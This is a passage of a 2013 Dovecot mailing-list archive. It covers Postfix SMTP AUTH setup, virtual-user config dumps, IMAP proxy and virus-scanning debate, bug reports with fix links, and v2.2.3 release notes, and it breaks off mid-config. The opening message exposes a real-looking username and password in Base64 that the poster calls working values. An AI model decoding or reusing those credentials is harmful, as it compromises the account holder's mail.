250-VRFY 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN AUTH LOGIN 334 VXNlcm5hbWU6 YWphaS5uZXQ= 334 UGFzc3dvcmQ6 bnlhcmFjdTAwNw== 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6 The username and password were Base64 encoded above and are known working values. Actually looking through the debug log I see that its looking for the passed-file in /home/vmail//vpasswd but my configuration has per-domain passed-files, e.g. /home/vmail/%d/vpasswd. Where do I set that ? -- A On Sat, Jun 15, 2013 at 6:21 AM, Benny Pedersen wrote: > Ajai Khattri skrev den 2013-06-14 18:56: > > Ive configured Postfix to use Dovecot for SMTP AUTH. >> >> I tried to test it but when I send the AUTH LOGIN command I get a response >> saying that AUTH method is not supported/implemented. How to test then? >> > > postconf -a > > is dovecot listed ? > > if yes post postconf -n on pastebin and show link here > > -- > senders that put my email into body content will deliver it to my own > trashcan, so if you like to get reply, dont do it > -- Aj. From yann.shukor at azurtem.net Sun Jun 16 10:09:35 2013 From: yann.shukor at azurtem.net (Yann Shukor) Date: Sun, 16 Jun 2013 09:09:35 +0200 Subject: [Dovecot] dovecot creating unknown users Message-ID: <51BD64AF.8050306@azurtem.net> Hi We recently installed a dovecot postfix roundcube debian wheezy serverIt is now in production and we are feeling our way as we progressivelyadd new users to this local server. I noticed that dovecot is creating user directory structures for unknown users withinour domain in /var/vmail, even though we have setup a static users.conf db file. I tried omiting the "allow_all_users=yes" parameter but that doesn't seem to be linked to this issue Sorry if this has been asked a number of times already Is there an easy way to search the archives of this mailinglist ? Thanks yann # 2.2.2 (45399357008a): /etc/dovecot/dovecot.conf # OS: Linux 3.2.0-4-686-pae i686 Debian 7.0 ext4 auth_debug = yes auth_mechanisms = plain login auth_socket_path = /var/run/dovecot/auth-userdb auth_verbose = yes disable_plaintext_auth = no first_valid_gid = 5000 first_valid_uid = 5000 hostname = holimail.holinice.com last_valid_gid = 5000 last_valid_uid = 5000 listen = * mail_debug = yes mail_gid = vmail mail_location = maildir:/var/vmail/%d/%n/Maildir mail_privileged_group = mail mail_uid = vmail managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave namespace inbox { inbox = yes location = maildir:/var/vmail/%d/%n/Maildir mailbox Drafts { special_use = \Drafts } mailbox Junk { special_use = \Junk } mailbox Sent { special_use = \Sent } mailbox "Sent Messages" { special_use = \Sent } mailbox Trash { special_use = \Trash } prefix = subscriptions = yes } passdb { args = scheme=CRAM-MD5 /etc/dovecot/users.conf driver = passwd-file } passdb { driver = pam } plugin { sieve = ~/.dovecot.sieve sieve_dir = ~/sieve } postmaster_address = azurtem at holinice.com protocols = " imap sieve pop3" service auth-worker { user = $default_internal_user } service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0666 user = postfix } unix_listener auth-userdb { group = vmail mode = 0600 user = vmail } } service imap-login { group = dovecot inet_listener imap { port = 143 } inet_listener imaps { port = 993 ssl = yes } } service imap { process_limit = 1024 } service pop3-login { inet_listener pop3 { port = 110 } inet_listener pop3s { port = 995 ssl = yes } } service pop3 { process_limit = 1024 } ssl_cert = Hi, I'm considering patching Dovecot to work as a transparent (and virus scanning) IMAP proxy. What is the appropriate feature to extend? (I've considered the following: IMAPC and reverse proxying, with IMAPC looking more promising since it actually parses IMAP communication). Can anyone who is familiar with the IMAPC code recommend what are the most appropriate locations in the code to make the required changes? (I've considered hooking the storage virtual functions and making the settings local rather than global - but would appreciate more specific ideas). Thanks. From h.reindl at thelounge.net Sun Jun 16 16:46:44 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Sun, 16 Jun 2013 15:46:44 +0200 Subject: [Dovecot] Transparent IMAP proxy In-Reply-To: <51BDC0CB.3020600@cuppcomputing.com> References: <51BDC0CB.3020600@cuppcomputing.com> Message-ID: <51BDC1C4.6030802@thelounge.net> Am 16.06.2013 15:42, schrieb Yonatan Broza: > I'm considering patching Dovecot to work as a transparent (and virus scanning) IMAP proxy why would someone implement a virus scanner on the IMAP-level? what happens with POP3? this has to be done on SMTP level long before the message is stored and not every time a client is downloading a message -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From epek at gmx.net Sun Jun 16 17:21:13 2013 From: epek at gmx.net (Erich N. Pekarek) Date: Sun, 16 Jun 2013 16:21:13 +0200 (CEST) Subject: [Dovecot] Still virtio problems Message-ID: Hello! ? As posted on May 27th this year, dovecot 2.1.7 does not allow for the mailstore to be located in a virtio partition. I still receive fstat()-errors on the lock files in this combination: ? May 27 12:54:51 host dovecot: imap(test at mydomain): Error: fstat(/var/vmail/mydomain/test/.quotausage.lock) failed: No such file or directory May 27 12:54:51 host dovecot: imap(test at mydomain): Error: file dict commit: file_dotlock_open(/var/vmail/mydomain/test/.quotausage) failed: No such file or directory May 27 12:54:51 host dovecot: imap(test at mydomain): Error: fstat(/var/vmail/mydomain/test/Maildir/dovecot-uidlist.lock) failed: No such file or directory Config includes:? mmap_disable=yes dotlock_use_excl=no ? Any ideas? Thanks ? Erich From h.reindl at thelounge.net Sun Jun 16 17:30:20 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Sun, 16 Jun 2013 16:30:20 +0200 Subject: [Dovecot] Still virtio problems In-Reply-To: References: Message-ID: <51BDCBFC.6060704@thelounge.net> Am 16.06.2013 16:21, schrieb Erich N. Pekarek: > As posted on May 27th this year, dovecot 2.1.7 does not allow for the mailstore to be located in a virtio partition. > I still receive fstat()-errors on the lock files in this combination: > > May 27 12:54:51 host dovecot: imap(test at mydomain): Error: fstat(/var/vmail/mydomain/test/.quotausage.lock) failed: No such file or directory > May 27 12:54:51 host dovecot: imap(test at mydomain): Error: file dict commit: file_dotlock_open(/var/vmail/mydomain/test/.quotausage) failed: No such file or directory > May 27 12:54:51 host dovecot: imap(test at mydomain): Error: fstat(/var/vmail/mydomain/test/Maildir/dovecot-uidlist.lock) failed: No such file or directory > > Config includes: > mmap_disable=yes > dotlock_use_excl=no dovecot knows nothing about virtio as any other software because it is a layer far below the applications /var/vmail/mydomain/test/.quotausage.lock: No such file or directory does the folder "/var/vmail/mydomain/test" exists and what permissions? what permissions has "/var/vmail/mydomain/"? and what permissions has "/var/vmail/"? -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From tss at iki.fi Sun Jun 16 20:06:01 2013 From: tss at iki.fi (Timo Sirainen) Date: Sun, 16 Jun 2013 20:06:01 +0300 Subject: [Dovecot] Transparent IMAP proxy In-Reply-To: <51BDC0CB.3020600@cuppcomputing.com> References: <51BDC0CB.3020600@cuppcomputing.com> Message-ID: <6F3AF60B-B729-4C03-997D-F07D09D6922F@iki.fi> On 16.6.2013, at 16.42, Yonatan Broza wrote: > I'm considering patching Dovecot to work as a transparent (and virus scanning) IMAP proxy. > > What is the appropriate feature to extend? (I've considered the following: IMAPC and reverse proxying, with IMAPC looking more promising since it actually parses IMAP communication). > > Can anyone who is familiar with the IMAPC code recommend what are the most appropriate locations in the code to make the required changes? (I've considered hooking the storage virtual functions and making the settings local rather than global - but would appreciate more specific ideas). imapc and http://dovecot.org/patches/2.1/mail-filter.tar.gz can do this. But note that the MIME structure or the parts' sizes must not change. Basically you'll have to replace the viruses with empty spaces or something. imapc isn't very efficient though. It translates all IMAP commands to rather simple ones. So for example a SEARCH won't be passed through to the backend server. From tss at iki.fi Sun Jun 16 20:19:10 2013 From: tss at iki.fi (Timo Sirainen) Date: Sun, 16 Jun 2013 20:19:10 +0300 Subject: [Dovecot] Dovecot 2.2.2: doveadm user doesn't honor -x option In-Reply-To: <016CDD6F-ACA9-431D-920B-E29BD8DF2FD2@swing.be> References: <016CDD6F-ACA9-431D-920B-E29BD8DF2FD2@swing.be> Message-ID: <14D65C5E-31C0-4164-B71F-E33961B92B6E@iki.fi> On 6.6.2013, at 21.51, Axel Luttgens wrote: > Hello, > > 1. Considering a user_query similar to this one: > > SELECT ... FROM ... WHERE CASE '%s' WHEN 'lmtp' THEN ... > > and issuing following command: > > doveadm user -x service=lmtp someuser at example.com > > the log shows: > > SELECT ... FROM ... WHERE CASE 'doveadm' WHEN 'lmtp' THEN ... > > and the query of course fails. Fixed: http://hg.dovecot.org/dovecot-2.2/rev/c290383e60da > The same config with Dovecot 2.1.16 yields expected results. v2.1 worked a bit differently by returning only the userdb info and skipping the dovecot.conf settings. Giving -u parameter to doveadm user uses the old way, and the service works also there. > 2. This is more a question. > > Issuing above command first writes this to the log: > > prefetch(someuser at example.com): passdb didn't return userdb entries, trying the next userdb > > Is there really an attempt to make use of the prefetch database? Yes. > If yes, under which circumstances could it succeed? Never with only a userdb lookup. But it's generic code. I guess the debug log entry could be hidden if it disturbs people too much.. From tss at iki.fi Sun Jun 16 20:21:54 2013 From: tss at iki.fi (Timo Sirainen) Date: Sun, 16 Jun 2013 20:21:54 +0300 Subject: [Dovecot] doveadm index crashes when indexing shared mailboxes In-Reply-To: <51B5BED2.4070500@exalondelft.nl> References: <51B5BED2.4070500@exalondelft.nl> Message-ID: On 10.6.2013, at 14.56, W. de Hoog wrote: > We store our mail archive in a tree of subfolders. I am trying to speed up text searching on our mail archive but when running "doveadm -D -v index -u neil shared/Exalon/Aandeelhouders" the following output is produced: .. > doveadm(neil): Panic: file mbox-storage.c: line 711 (mbox_transaction_unlock): assertion failed: (mbox->box.transaction_count > 0 || mbox->mbox_lock_type == F_UNLCK) mbox is a pretty difficult format, and I wouldn't recommend using it for anything else than small simple legacy setups. > # 2.1.7: /etc/dovecot/dovecot.conf If this happens also with v2.2 I could look into it. From tss at iki.fi Sun Jun 16 20:34:38 2013 From: tss at iki.fi (Timo Sirainen) Date: Sun, 16 Jun 2013 20:34:38 +0300 Subject: [Dovecot] Connection closed by foreign host. In-Reply-To: <20130613081601.Horde.F_0enKWT864m__P6Mlv7nQ1@horde.bigmichi1.de> References: <20130611192841.Horde.dSxEri7dixlgJ-8Kf7tulg5@horde.bigmichi1.de> <1371088979.24006.12.camel@innu.dovecot.net> <20130613063704.Horde.3GSc686GqFEkfn4te-0wew7@horde.bigmichi1.de> <11781C18-8F45-4AD9-BF3A-C7405CDD68D0@iki.fi> <20130613081601.Horde.F_0enKWT864m__P6Mlv7nQ1@horde.bigmichi1.de> Message-ID: <6D7C8D86-27D2-4D80-B508-B2CD5CFC3C45@iki.fi> On 13.6.2013, at 9.16, Michael Cramer wrote: >>>>> 3 LIST () "" (*) >>>>> Connection closed by foreign host. .. > now the full conf > > # 2.2.2 (45399357008a): /etc/dovecot/dovecot.conf Is it fixed with a newer version? I think http://hg.dovecot.org/dovecot-2.2/rev/04ee59c96fc9 fixed it? From tss at iki.fi Sun Jun 16 20:36:12 2013 From: tss at iki.fi (Timo Sirainen) Date: Sun, 16 Jun 2013 20:36:12 +0300 Subject: [Dovecot] rawlog without setting home in userdb In-Reply-To: References: <51AAFE3C.8080701@bayern-mail.de> <1371091315.24006.16.camel@innu.dovecot.net> Message-ID: <8B7E4A47-1573-4CB2-8BB3-18DA5A9BC00C@iki.fi> On 13.6.2013, at 11.03, claus.r at bayern-mail.de wrote: > A little extra question: why do you split in and out in rawlog? It was easier to implement :) Although nowadays there's iostream_rawlog that would make it easy to implement a combined log. From michael at bigmichi1.de Sun Jun 16 20:49:01 2013 From: michael at bigmichi1.de (Michael Cramer) Date: Sun, 16 Jun 2013 17:49:01 +0000 Subject: [Dovecot] Connection closed by foreign host. In-Reply-To: <6D7C8D86-27D2-4D80-B508-B2CD5CFC3C45@iki.fi> References: <20130611192841.Horde.dSxEri7dixlgJ-8Kf7tulg5@horde.bigmichi1.de> <1371088979.24006.12.camel@innu.dovecot.net> <20130613063704.Horde.3GSc686GqFEkfn4te-0wew7@horde.bigmichi1.de> <11781C18-8F45-4AD9-BF3A-C7405CDD68D0@iki.fi> <20130613081601.Horde.F_0enKWT864m__P6Mlv7nQ1@horde.bigmichi1.de> <6D7C8D86-27D2-4D80-B508-B2CD5CFC3C45@iki.fi> Message-ID: <20130616174901.Horde.vg1RZFwSeZXPv9Qzgr4QAA2@horde.bigmichi1.de> Zitat von Timo Sirainen : > On 13.6.2013, at 9.16, Michael Cramer wrote: > >>>>>> 3 LIST () "" (*) >>>>>> Connection closed by foreign host. > .. >> now the full conf >> >> # 2.2.2 (45399357008a): /etc/dovecot/dovecot.conf > > Is it fixed with a newer version? I think > http://hg.dovecot.org/dovecot-2.2/rev/04ee59c96fc9 fixed it? i tired today the 2.2.2-auto+68 build and it works, thanks From genie at geniechka.ru Sun Jun 16 20:31:49 2013 From: genie at geniechka.ru (Eugene) Date: Sun, 16 Jun 2013 21:31:49 +0400 Subject: [Dovecot] Transparent IMAP proxy In-Reply-To: <51BDC1C4.6030802@thelounge.net> References: <51BDC0CB.3020600@cuppcomputing.com> <51BDC1C4.6030802@thelounge.net> Message-ID: <6933A39ABA174F36AFC44A2948E27B98@geniepc2011> From: Reindl Harald > why would someone implement a virus scanner on the IMAP-level? > what happens with POP3? > this has to be done on SMTP level long before the message is stored > and not every time a client is downloading a message Or, as an alternative, most desktop antivirus tools have a mail-scanning capability. But SMTP is certainly better (though IMO even that is not really needed if you have reasonable antispam filtering and think before opening attachments). Cheers Eugene From tss at iki.fi Sun Jun 16 21:10:09 2013 From: tss at iki.fi (Timo Sirainen) Date: Sun, 16 Jun 2013 21:10:09 +0300 Subject: [Dovecot] LMTP crash with sdbox and SIS In-Reply-To: <51B97618.5020603@birkenwald.de> References: <1371088613.24006.9.camel@innu.dovecot.net> <51B97618.5020603@birkenwald.de> Message-ID: <96FBF934-882F-4B0B-A94A-0AD7ABA23361@iki.fi> On 13.6.2013, at 10.34, Bernhard Schmidt wrote: >>> Jun 12 21:46:23 lxmhs69 dovecot: lmtp(20120, >>> ext44903 at mstoretest.mail.xxx.de): Panic: file istream.c: line 163 >>> (i_stream_read): assertion failed: (old_size == _stream->pos - >>> _stream->skip) >> >> Can you easily reproduce this? Does it happen with all mails? Only mails >> that contain attachments? Only one specific mail? I couldn't reproduce >> with a couple of tests. > > I can reproduce with mails with a random attachment > 128k. I'm using smtp-cli to test > > dd if=/dev/random of=random1M bs=1M count=1 > ./smtp-cli-3.2 --server --from --to --subject Test --attach=random1M Thanks, fixed: http://hg.dovecot.org/dovecot-2.2/rev/9dcbcc0871f0 From tss at iki.fi Sun Jun 16 21:16:03 2013 From: tss at iki.fi (Timo Sirainen) Date: Sun, 16 Jun 2013 21:16:03 +0300 Subject: [Dovecot] MULTIAPPEND + literal8 issue In-Reply-To: <20130613092244.Horde.y4olAJyyzXJaVfbn-uJApA5@bigworm.curecanti.org> References: <20130613092244.Horde.y4olAJyyzXJaVfbn-uJApA5@bigworm.curecanti.org> Message-ID: <63B6489B-EFD1-4B07-9601-FE403E802FCB@iki.fi> Fixed: http://hg.dovecot.org/dovecot-2.2/rev/dd04b4ef530d On 13.6.2013, at 18.22, Michael M Slusarz wrote: > Background: importing a mbox file containing ~700 messages (20 MB). Our program splits MULTIAPPENDS into approx. 5MB chunks. We don't use literal+ in order to immediately catch errors. > > I can reproducibly produce the following error (2.2.2) when doing a MULTIAPPEND where every append is using literal8: > > [...340 messages appended in 7 previous APPEND commands...] > C: 10 APPEND Test "16-Dec-2011 17:19:46 -0700" ~{3128} > [...~30 APPENDed messages...] > C: "18-Jan-2012 12:38:21 -0700" ~{2893} > S: + OK > [...2893 octets of data...] > C: "18-Jan-2012 22:09:41 -0700" ~{6492} > S: 10 BAD Error in IMAP command APPEND: Expected '{' > S: 492} BAD Error in IMAP command : Unknown command. > > This error occurs about 340 messages in. If I switch to using regular literals, this error does not occur. I can verify that neither the 12:38:21 message nor the 22:09:41 message alone is broken (I can put just these two in a file and import and it is successful). > > I can provide the mbox file privately, if needed. > > michael > From tss at iki.fi Sun Jun 16 21:26:09 2013 From: tss at iki.fi (Timo Sirainen) Date: Sun, 16 Jun 2013 21:26:09 +0300 Subject: [Dovecot] dovecot 2.2 with lucene compile error In-Reply-To: <51BADF4F.1090606@sys4.de> References: <51BADF4F.1090606@sys4.de> Message-ID: <5142DA77-3BAF-4164-8ADE-D8EDD8755EC0@iki.fi> On 14.6.2013, at 12.15, Robert Schetterer wrote: > Hi ,i get an compile error > > security -Werror=format-security -MT lucene-wrapper.lo -MD -MP -MF > .deps/lucene-wrapper.Tpo -c lucene-wrapper.cc -fPIC -DPIC -o > .libs/lucene-wrapper.o > lucene-wrapper.cc: In function 'lucene_index* lucene_index_init(const > char*, mailbox_list*, const fts_lucene_settings*)': > lucene-wrapper.cc:128:2: error: 'else' without a previous 'if' > make[5]: *** [lucene-wrapper.lo] Error 1 Fixed: http://hg.dovecot.org/dovecot-2.2/rev/3c9bb07ea92e From tss at iki.fi Sun Jun 16 21:31:40 2013 From: tss at iki.fi (Timo Sirainen) Date: Sun, 16 Jun 2013 21:31:40 +0300 Subject: [Dovecot] [Dovcot 2.2.2] Q: Prequisits for compiling and plugins In-Reply-To: <1371193871.2845.11.camel@starcommand> References: <1371193871.2845.11.camel@starcommand> Message-ID: On 14.6.2013, at 10.11, Christoph Hinterm?ller wrote: > Where can i find the list of prerequisites for compiling dovocot 2.2.2 > form the sources, is there a dedicated link or what terms i should best > use to search the archives of this mailing list, the documentation or > the web? Dovecot doesn't really require anything, but depending on what features you want to use you may need to install some libraries, like openssl. http://wiki2.dovecot.org/CompilingSource has some things if you want to compile from Mercurial. > Where do I find information (links or search terms) whether plugins > available for 1.x 2.1.x series, especially the metadata plugin, are > still needed for 2.2.2 or may even be harmful for 2.2.2 as built in. > Documentation on Dovecot webpage is rather sparse and not really > conclusive concerning metadata plugin within 2.x series. On my Ubuntu > 12.X systems i still find it for 2.1.x but I have difficulties to > understand whether there exist a version for 2.2.X series, if this is > equal to the one for 2.1.X or whether it is not needed any more for > 2.2.X series. Further what libraries would be required. In general: If it compiles, it works. http://hg.dovecot.org/dovecot-metadata-plugin/ has v2.2 compatibility. At some point in v2.2.x development it will probably have native METADATA support. From gedalya at gedalya.net Sun Jun 16 22:19:43 2013 From: gedalya at gedalya.net (Gedalya) Date: Sun, 16 Jun 2013 15:19:43 -0400 Subject: [Dovecot] Transparent IMAP proxy In-Reply-To: <6933A39ABA174F36AFC44A2948E27B98@geniepc2011> References: <51BDC0CB.3020600@cuppcomputing.com> <51BDC1C4.6030802@thelounge.net> <6933A39ABA174F36AFC44A2948E27B98@geniepc2011> Message-ID: <51BE0FCF.3090301@gedalya.net> On 06/16/2013 01:31 PM, Eugene wrote: > Or, as an alternative, most desktop antivirus tools have a > mail-scanning capability. > But SMTP is certainly better (though IMO even that is not really > needed if you have reasonable antispam filtering and think before > opening attachments). In my experience, an anti-virus is left with almost nothing to catch if you let spamassassin reject mail above a certain score, and so the AV never gets to see those. However one benefit of delaying AV scanning is that you get later signatures, so you could potentially deal better with 0-hour viruses. But overall AV is just ineffective. From tss at iki.fi Sun Jun 16 22:30:24 2013 From: tss at iki.fi (Timo Sirainen) Date: Sun, 16 Jun 2013 22:30:24 +0300 Subject: [Dovecot] IMAP MOVE and lazy_expunge_only_last_instance In-Reply-To: References: Message-ID: <7529EB59-5F48-4012-8863-F8D36233BB00@iki.fi> On 14.6.2013, at 10.12, Pavel Volkovitskiy wrote: > im testing lazy_expunge_only_last_instance here and it seems it works wrong > with IMAP MOVE I suppose you mean with mdbox format? Seems to be annoyingly difficult to fix.. From tss at iki.fi Sun Jun 16 22:33:10 2013 From: tss at iki.fi (Timo Sirainen) Date: Sun, 16 Jun 2013 22:33:10 +0300 Subject: [Dovecot] Multiple user sharing a single mailbox In-Reply-To: References: Message-ID: On 14.6.2013, at 22.31, Jonathon Price wrote: > If having a single seen flag for the mailboxs was preferred, i.e. no > private indexes. Is there a recommended mail store format that would work > best with higher levels of concurrent access? Anything but mbox works fine. From tss at iki.fi Sun Jun 16 22:46:51 2013 From: tss at iki.fi (Timo Sirainen) Date: Sun, 16 Jun 2013 22:46:51 +0300 Subject: [Dovecot] quota-status not working in distributed environment In-Reply-To: <201306140815.29338.benoit.panizzon@imp.ch> References: <201306131214.04765.benoit.panizzon@imp.ch> <20130613150749.GE58518@anubis.morrow.me.uk> <201306140815.29338.benoit.panizzon@imp.ch> Message-ID: <07F9A1F0-B6DA-4885-9A2C-ED56E9603440@iki.fi> On 14.6.2013, at 9.15, Benoit Panizzon wrote: > Is there a way to get quota-status to also use the proxy feature to request > the quota information from the correct machine? Looks like this is a missing feature. I first thought quota-status would go through doveadm protocol, which would make this work via doveadm proxying, but looks like it doesn't. Perhaps it optionally should. > Btw, the quota-status just return DUNNO or 'Quota Full'. Is there a similar > easy way to check the ammount of quota used? I could then update that > information in the database and use it to, for example find abandoned > mailboxes. doveadm quota get command can be used to ask for the user's current quota. You can ask the same via TCP protocol as well: http://wiki2.dovecot.org/Design/DoveadmProtocol From andrzej.filip at gmail.com Sun Jun 16 23:12:19 2013 From: andrzej.filip at gmail.com (Andrzej A. Filip) Date: Sun, 16 Jun 2013 22:12:19 +0200 Subject: [Dovecot] Transparent IMAP proxy In-Reply-To: <51BDC0CB.3020600@cuppcomputing.com> References: <51BDC0CB.3020600@cuppcomputing.com> Message-ID: <51BE1C23.8050208@gmail.com> On 06/16/2013 03:42 PM, Yonatan Broza wrote: > I'm considering patching Dovecot to work as a transparent (and virus > scanning) IMAP proxy. > [...] Have you considered non transparent caching proxy? From tss at iki.fi Mon Jun 17 00:41:57 2013 From: tss at iki.fi (Timo Sirainen) Date: Mon, 17 Jun 2013 00:41:57 +0300 Subject: [Dovecot] v2.2.3 released Message-ID: <1371418917.5513.3.camel@innu.dovecot.net> http://dovecot.org/releases/2.2/dovecot-2.2.3.tar.gz http://dovecot.org/releases/2.2/dovecot-2.2.3.tar.gz.sig This is a pretty important upgrade for v2.2 users, because of the IMAP ENVELOPE reply fix. * LDA/LMTP: If new mail delivery first fails with "temporary failure", tempfail the whole delivery instead of falling back to delivering the mail to INBOX. (Requires new Pigeonhole as well.) * doc/solr-schema.xml was updated to Solr v4.x format. Also the default analyzers were changed, hopefully for the better. Note that the schema can't be changed for existing Solr indexes without rebuilding everything. * Solr plugin does only soft commits from now on. You'll need a cronjob to send a hard commit command to it every few minutes. + Added %N modifier for variables as %H-like "new hash" + sdbox, mdbox: Support POP3 message order field (for migrations) + Added mailbox { driver } to specify a different mail storage format for the mailbox than generally used within the namespace. + Added initial lib-sasl library for client side SASL support. Currently supports only PLAIN, LOGIN and plugins. Used currently by IMAP and POP3 proxying when authenticating to the remote server. - IMAP: If subject contained only whitespace, Dovecot returned an ENVELOPE reply with a huge literal value, effectively causing the IMAP client to wait for more data forever. - IMAP: Various URLAUTH fixes. - imapc: Various bugfixes and improvements - pop3c: Various fixes to make it work in dsync (without imapc) - dsync: Fixes to syncing subscriptions. Fixes to syncing mailbox renames. From jason at pfingstmann.com Mon Jun 17 02:15:53 2013 From: jason at pfingstmann.com (Jason Pfingstmann) Date: Sun, 16 Jun 2013 16:15:53 -0700 Subject: [Dovecot] Trash plugin Message-ID: Hello! This is my first dovecot install, which I put together by mixing and matching pieces of various online howtos (fortunately, Dovecot doesn't seem to be overly complex - a big plus). I've got it mostly working, but the trash plugin doesn't seem to be working right. Below are configs and some logs. Any thoughts? Also, any suggestions regarding my configuration? I can post other items for troubleshooting if they'd be helpful. -Jason Pfingstmann Here's my doveconf -n: # 2.0.9: /etc/dovecot/dovecot.conf # OS: Linux 2.6.32-358.6.2.el6.x86_64 x86_64 CentOS release 6.4 (Final) ext4 auth_anonymous_username = anonymous auth_cache_negative_ttl = 1 hours auth_cache_size = 0 auth_cache_ttl = 1 hours auth_debug = no auth_debug_passwords = no auth_default_realm = auth_failure_delay = 2 secs auth_first_valid_uid = 500 auth_gssapi_hostname = auth_krb5_keytab = auth_last_valid_uid = 0 auth_master_user_separator = auth_mechanisms = plain login auth_realms = auth_socket_path = auth-userdb auth_ssl_require_client_cert = no auth_ssl_username_from_cert = no auth_use_winbind = no auth_username_chars = abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890.-_@ auth_username_format = auth_username_translation = auth_verbose = no auth_verbose_passwords = no auth_winbind_helper_path = /usr/bin/ntlm_auth auth_worker_max_count = 30 base_dir = /var/run/dovecot config_cache_size = 1 M debug_log_path = default_client_limit = 1000 default_idle_kill = 60 default_internal_user = dovecot default_login_user = dovenull default_process_limit = 100 default_vsz_limit = 256 M deliver_log_format = msgid=%m: %$ dict { quotadict = mysql:/etc/dovecot/dovecot-dict-quota.conf } dict_db_config = director_doveadm_port = 0 director_mail_servers = director_servers = director_user_expire = 15 mins disable_plaintext_auth = yes dotlock_use_excl = no doveadm_socket_path = doveadm-server doveadm_worker_count = 0 first_valid_gid = 12 first_valid_uid = 101 hostname = imap_capability = imap_client_workarounds = imap_id_log = imap_id_send = imap_idle_notify_interval = 2 mins imap_logout_format = bytes=%i/%o imap_max_line_length = 64 k info_log_path = last_valid_gid = 0 last_valid_uid = 0 lda_mailbox_autocreate = yes lda_mailbox_autosubscribe = yes lda_original_recipient_header = libexec_dir = /usr/libexec/dovecot listen = *, :: lmtp_proxy = no lmtp_save_to_detail_mailbox = yes lock_method = fcntl log_path = syslog log_timestamp = "%b %d %H:%M:%S " login_access_sockets = login_greeting = Dovecot ready. login_log_format = %$: %s login_log_format_elements = user=<%u> method=%m rip=%r lip=%l mpid=%e %c login_trusted_networks = mail_access_groups = mail_attachment_dir = mail_attachment_fs = sis posix mail_attachment_hash = %{sha1} mail_attachment_min_size = 128 k mail_cache_fields = flags mail_cache_min_mail_count = 0 mail_chroot = mail_debug = no mail_fsync = optimized mail_full_filesystem_access = no mail_gid = mail_home = mail_location = maildir:/home/vmail/%d/%n mail_log_prefix = "%s(%u): " mail_max_keyword_length = 50 mail_max_lock_timeout = 0 mail_max_userip_connections = 10 mail_never_cache_fields = imap.envelope mail_nfs_index = no mail_nfs_storage = no mail_plugin_dir = /usr/lib64/dovecot mail_plugins = trash mail_privileged_group = mail_save_crlf = no mail_temp_dir = /tmp mail_uid = mailbox_idle_check_interval = 30 secs mailbox_list_index_disable = no maildir_copy_with_hardlinks = yes maildir_stat_dirs = no maildir_very_dirty_syncs = no managesieve_client_workarounds = managesieve_implementation_string = Dovecot Pigeonhole managesieve_logout_format = bytes=%i/%o managesieve_max_compile_errors = 5 managesieve_max_line_length = 65536 managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date master_user_separator = mbox_dirty_syncs = yes mbox_dotlock_change_timeout = 2 mins mbox_lazy_writes = yes mbox_lock_timeout = 5 mins mbox_min_index_size = 0 mbox_read_locks = fcntl mbox_very_dirty_syncs = no mbox_write_locks = dotlock fcntl mdbox_preallocate_space = no mdbox_rotate_interval = 0 mdbox_rotate_size = 2 M mmap_disable = no passdb { args = /etc/dovecot/dovecot-mysql.conf deny = no driver = sql master = no pass = no } plugin { acl = vfile:/etc/dovecot/acls quota = dict:user::proxy::quotadict sieve = ~/dovecot.sieve sieve_dir = ~/sieve sieve_global_dir = /home/sieve/ sieve_global_path = /home/sieve/globalfilter.sieve sieve_max_script_size = 1M trash = /etc/dovecot/trash.conf } pop3_client_workarounds = pop3_enable_last = no pop3_fast_size_lookups = no pop3_lock_session = no pop3_logout_format = top=%t/%p, retr=%r/%b, del=%d/%m, size=%s pop3_no_flag_updates = no pop3_reuse_xuidl = no pop3_save_uidl = no pop3_uidl_format = %08Xu%08Xv postmaster_address = protocols = imap pop3 lmtp sieve quota_full_tempfail = no recipient_delimiter = + rejection_reason = Your message to <%t> was automatically rejected:%n%r rejection_subject = Rejected: %s sendmail_path = /usr/sbin/sendmail service anvil { chroot = empty client_limit = 0 drop_priv_before_exec = no executable = anvil extra_groups = group = idle_kill = 4294967295 secs privileged_group = process_limit = 1 process_min_avail = 1 protocol = service_count = 0 type = anvil unix_listener anvil-auth-penalty { group = mode = 0600 user = } unix_listener anvil { group = mode = 0600 user = } user = $default_internal_user vsz_limit = 18446744073709551615 B } service auth-worker { chroot = client_limit = 1 drop_priv_before_exec = no executable = auth -w extra_groups = group = idle_kill = 0 privileged_group = process_limit = 0 process_min_avail = 0 protocol = service_count = 1 type = unix_listener auth-worker { group = mode = 0600 user = $default_internal_user } user = vsz_limit = 18446744073709551615 B } service auth { chroot = client_limit = 4096 drop_priv_before_exec = no executable = auth extra_groups = group = idle_kill = 0 privileged_group = process_limit = 1 process_min_avail = 0 protocol = service_count = 0 type = unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0666 user = postfix } unix_listener auth-client { group = mode = 0600 user = } unix_listener auth-login { group = mode = 0600 user = $default_internal_user } unix_listener auth-master { group = mode = 0600 user = } unix_listener auth-userdb { group = vmail mode = 0666 user = vmail } unix_listener login/login { group = mode = 0666 user = } user = $default_internal_user vsz_limit = 18446744073709551615 B } service config { chroot = client_limit = 0 drop_priv_before_exec = no executable = config extra_groups = group = idle_kill = 0 privileged_group = process_limit = 0 process_min_avail = 0 protocol = service_count = 0 type = config unix_listener config { group = mode = 0600 user = } user = vsz_limit = 18446744073709551615 B } service dict { chroot = client_limit = 1 drop_priv_before_exec = no executable = dict extra_groups = group = idle_kill = 0 privileged_group = process_limit = 0 process_min_avail = 0 protocol = service_count = 0 type = unix_listener dict { group = vmail mode = 0666 user = vmail } user = $default_internal_user vsz_limit = 18446744073709551615 B } service director { chroot = client_limit = 0 drop_priv_before_exec = no executable = director extra_groups = fifo_listener login/proxy-notify { group = mode = 00 user = } group = idle_kill = 